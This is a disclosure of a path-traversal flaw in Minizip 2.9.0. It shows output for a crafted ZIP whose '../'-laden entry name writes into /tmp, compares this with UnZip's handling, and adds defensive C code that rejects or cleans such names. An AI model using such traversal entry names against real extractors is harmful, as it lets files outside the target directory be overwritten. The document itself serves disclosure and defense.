With a specially crafted ZIP file, Minizip (via mz_zip_reader_save_all()) will write into $CWD/..
Minizip 2.9.0 - https://github.com/nmoinvaz/minizip
---------------------------------------------------
-l t.zip
Packed Unpacked Ratio Method Attribs  Date     Time  CRC-32   Name
------ -------- ----- ------ -------  ----     ----  ------   ----
    17       17  100% Stored 81800080 11-04-06 11:33 c7f761e7 ././y/x/../../../../../../../tmp/zz
    21       56   37% Defl:X 81800080 10-22-19 23:48 572b1c12 ././y/x/../../../../../../../tmp/zz
Extraction:
Minizip 2.9.0 - https://github.com/nmoinvaz/minizip
---------------------------------------------------
-x t.zip
Archive t.zip
Extracting ././y/x/../../../../../../../tmp/zz
The file ../tmp/zz exists. Overwrite ? [y]es, [n]o, [A]ll:
Note how e.g. UnZip 6.00 handles this situation:
$ unzip t.zip
Archive: t.zip
warning: skipped "../" path component(s) in ././y/x/../../../../../../../tmp/zz
extracting: y/x/tmp/zz
warning: skipped "../" path component(s) in ././y/x/../../../../../../../tmp/zz
replace y/x/tmp/zz? [y]es, [n]o, [A]ll, [N]one, [r]ename:
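
The check an extractor can run on each entry name before opening the output file, as an added example (not Minizip's or UnZip's code): the function names are hypothetical, and the sample name is the one from the t.zip listing. The first function rejects a name that resolves outside the extraction directory; the second reproduces the "skipped ../ path component(s)" cleanup shown in the UnZip output.

```c
#include <stdio.h>
#include <string.h>
static const char SAMPLE[] = "././y/x/../../../../../../../tmp/zz"; /* from the t.zip listing */

/* Returns 1 if the name is absolute or ".." climbs above the extraction root. */
int entry_escapes_root(const char *name)
{
    int depth = 0;
    if (name[0] == '/' || name[0] == '\\') return 1;
    while (*name) {
        size_t len = strcspn(name, "/\\");          /* next path component */
        int up = (len == 2 && name[0] == '.' && name[1] == '.');
        if (up && --depth < 0) return 1;            /* left the root */
        if (!up && len > 0 && !(len == 1 && name[0] == '.')) depth++;
        name += len;
        if (*name) name++;                          /* skip the separator */
    }
    return 0;
}

/* UnZip-style cleanup: drops empty, "." and ".." parts; returns ".." count or -1. */
int strip_dot_components(const char *name, char *out, size_t outsz)
{
    int skipped = 0;
    size_t used = 0;
    if (outsz == 0) return -1;
    out[0] = '\0';
    while (*name) {
        size_t len = strcspn(name, "/\\");
        int dots = (len <= 2 && strspn(name, ".") >= len);  /* "", "." or ".." */
        if (dots && len == 2) skipped++;
        if (!dots) {
            if (used + len + 2 > outsz) return -1;  /* out is too small */
            if (used) out[used++] = '/';
            memcpy(out + used, name, len);
            out[used += len] = '\0';
        }
        name += len;
        if (*name) name++;
    }
    return skipped;
}

int main(void)
{
    char clean[256];
    int n = strip_dot_components(SAMPLE, clean, sizeof clean);
    printf("escapes=%d skipped=%d clean=%s\n", entry_escapes_root(SAMPLE), n, clean);
    return 0;
}
```

This is a purely lexical check: it does not handle Windows drive prefixes or symlinks that already exist inside the extraction directory.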